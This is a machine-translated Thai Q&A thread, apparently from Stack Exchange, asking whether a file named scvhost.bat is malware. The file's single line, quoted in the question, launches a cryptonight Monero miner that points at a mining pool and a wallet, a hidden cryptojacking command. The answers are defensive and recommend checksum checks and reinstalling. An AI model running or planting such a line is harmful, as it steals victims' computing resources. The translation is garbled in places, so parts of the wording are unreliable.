นี่คือ scvhost.bat ที่มี cryptonight ไวรัสหรือคนขุดแร่หรือไม่?


17

ฉันเพิ่งพบไฟล์. bat นี้ชื่อ scvhost.bat ไฟล์มีเนื้อหานี้อยู่:

scvhost -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 48uh2mrdkdq2tQysfkX2hZDi2hkRua4GX13EqY8djJ5xNXhez7baztVWbwXa34vUMveKAzAiA4j8xgUi29TpKXpm42jqV6H.microSf -p MXXXXXX-t 02

นี่เป็นไวรัส (เพื่อขโมยข้อมูล ฯลฯ ) หรือนักขุดที่ปลูกหรือไม่ ฉันเป็นห่วงเพราะฉันยังตะลุยสกุลเงินดิจิตอลและstratumเป็นสกุลเงินที่กล่าวถึงในไฟล์ด้านบน


1
ดูเหมือนว่านี่จะเป็นนักขุด ระบุว่าคุณใช้สกุลเงินดิจิตอลเข้ารหัสด้วยตัวเองหากคุณเป็นของฉันด้วยโปรดตรวจสอบให้แน่ใจว่านี่ไม่ใช่ส่วนหนึ่งของสิ่งที่คุณใช้ในการขุด คุณสามารถทำได้โดยเปลี่ยนชื่อนามสกุล. bat เป็นอย่างอื่นและดูว่าคุณยังคงสามารถขุดได้ตามปกติหลังจากรีบูตหรือไม่ สิ่งหนึ่งที่ฉันแปลกเกี่ยวกับไฟล์นี้ก็คือปกติแล้วมันจะเรียกตัวเองว่า scvhost เป็นทั้งชื่อของสิ่งที่เรียกใช้และไฟล์ bat โดยปกติแล้วจะส่งผลให้เกิดการวนซ้ำ
LPChip

2
@ VirtualAnomaly ฉันคิดว่าคุณเข้าใจผิดว่า sVChost กับ sCVhost พูดถึงที่นี่ ใช่ฉันรู้เป็นอย่างมากว่า svchost เป็นกลไกสำหรับการให้บริการโฮสติ้ง
LPChip

2
@ LPChip ขอโทษฉันถูกต้องฉันเข้าใจผิด
ความผิดปกติเสมือน

2
บางคนเล่นสตาร์คราฟมากเกินไปฉันเดา
CodesInChaos

1
@lucidbrot SCVs เป็นหน่วย "ผู้สร้าง" ของหนึ่งในการแข่งขันของเกม (terrans) ซึ่งในกรณีนี้คือ "Space Construction Vehicle"
แอรอน

คำตอบ:


34

นี่ดูเหมือนจะเป็นคนขุดแร่บางประเภทโดยเฉพาะอย่างยิ่งเนื่องจากพารามิเตอร์มี URL ไปยังสระว่ายน้ำการขุด อย่างไรก็ตามคุณต้องแน่ใจว่าสิ่งที่อยู่ในไบนารี มันจะสมเหตุสมผลที่จะเปรียบเทียบ checksums ของไบนารี่ที่คุณพบในระบบของคุณกับรีลีสที่สร้างโดยทีมพัฒนาของ miner หากพวกเขาแตกต่างกัน พิจารณาว่าระบบของคุณไม่ปลอดภัย

อีกปัญหาหนึ่งคือคุณค้นพบเกี่ยวกับตัวขุดนี้ (อาจเป็นเพราะมันใช้ CPU มาก) แต่คุณไม่รู้ว่าเกิดอะไรขึ้นในระบบของคุณ หากผู้บุกรุกสามารถเปิดตัวเครื่องขุดพวกเขาก็สามารถเปิดสิ่งอื่น ๆ ได้เช่นกัน มันอาจเป็นความคิดที่ดีในการกู้คืนจากการสำรองข้อมูลหรือทำการติดตั้งใหม่

โดยการใช้ไซต์ของเรา หมายความว่าคุณได้อ่านและทำความเข้าใจนโยบายคุกกี้และนโยบายความเป็นส่วนตัวของเราแล้ว
Licensed under cc by-sa 3.0 with attribution required.